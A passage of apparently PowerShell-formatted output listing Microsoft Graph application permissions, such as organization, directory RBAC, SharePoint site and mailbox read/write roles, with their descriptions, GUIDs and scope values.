1498 | Description        : Allows the app to read company places (conference rooms and room lists) for calendar events and other applications, without a 
1499 |                      signed-in user.
1500 | DisplayName        : Read all company places
1501 | Id                 : 913b9306-0ce1-42b8-9137-6a7df690a760
1502 | IsEnabled          : True
1503 | Value              : Place.Read.All
1504 | 
1505 | AllowedMemberTypes : {Application}
1506 | Description        : Allows the app to read the organization and related resources, without a signed-in user.Related resources include things like 
1507 |                      subscribed skus and tenant branding information.
1508 | DisplayName        : Read organization information
1509 | Id                 : 498476ce-e0fe-48b0-b801-37ba7e2685c6
1510 | IsEnabled          : True
1511 | Value              : Organization.Read.All
1512 | 
1513 | AllowedMemberTypes : {Application}
1514 | Description        : Allows the app to read and write the organization and related resources, without a signed-in user.Related resources include 
1515 |                      things like subscribed skus and tenant branding information.
1516 | DisplayName        : Read and write organization information
1517 | Id                 : 292d869f-3427-49a8-9dab-8c70152b74e9
1518 | IsEnabled          : True
1519 | Value              : Organization.ReadWrite.All
1520 | 
1521 | AllowedMemberTypes : {Application}
1522 | Description        : Allows the app to read the role-based access control (RBAC) settings for your company's directory, without a signed-in user.  
1523 |                      This includes reading directory role templates, directory roles and memberships.
1524 | DisplayName        : Read all directory RBAC settings
1525 | Id                 : 483bed4a-2ad3-4361-a73b-c83ccdbdc53c
1526 | IsEnabled          : True
1527 | Value              : RoleManagement.Read.Directory
1528 | 
1529 | AllowedMemberTypes : {Application}
1530 | Description        : Allows the app to read and manage the role-based access control (RBAC) settings for your company's directory, without a signed-in 
1531 |                      user. This includes instantiating directory roles and managing directory role membership, and reading directory role templates, 
1532 |                      directory roles and memberships.
1533 | DisplayName        : Read and write all directory RBAC settings
1534 | Id                 : 9e3f62cf-ca93-4989-b6ce-bf83c28f9fe8
1535 | IsEnabled          : True
1536 | Value              : RoleManagement.ReadWrite.Directory
1537 | 
1538 | AllowedMemberTypes : {Application}
1539 | Description        : Allows the app to create, read, update, and delete documents and list items in all site collections without a signed in user.
1540 | DisplayName        : Read and write items in all site collections (preview)
1541 | Id                 : 9492366f-7969-46a4-8d15-ed1a20078fff
1542 | IsEnabled          : True
1543 | Value              : Sites.ReadWrite.All
1544 | 
1545 | AllowedMemberTypes : {Application}
1546 | Description        : Allows the app to read and write feature rollout policies without a signed-in user. Includes abilities to assign and remove users 
1547 |                      and groups to rollout of a specific feature.
1548 | DisplayName        : Read and write feature rollout policies
1549 | Id                 : 2044e4f1-e56c-435b-925c-44cd8f6ba89a
1550 | IsEnabled          : True
1551 | Value              : Policy.ReadWrite.FeatureRollout
1552 | 
1553 | AllowedMemberTypes : {Application}
1554 | Description        : Allows the app to read basic mail properties in all mailboxes without a signed-in user. Includes all properties except body, 
1555 |                      previewBody, attachments and any extended properties.
1556 | DisplayName        : Read basic mail in all mailboxes
1557 | Id                 : 6be147d2-ea4f-4b5a-a3fa-3eab6f3c140a
1558 | IsEnabled          : True
1559 | Value              : Mail.ReadBasic
1560 | 
1561 | AllowedMemberTypes : {Application}
1562 | Description        : Allows the app to read basic mail properties in all mailboxes without a signed-in user. Includes all properties except body, 
1563 |                      previewBody, attachments and any extended properties.
1564 | DisplayName        : Read basic mail in all mailboxes
1565 | Id                 : 693c5e45-0940-467d-9b8a-1022fb9d42ef
1566 | IsEnabled          : True
1567 | Value              : Mail.ReadBasic.All
1568 | 
1569 | 


--------------------------------------------------------------------------------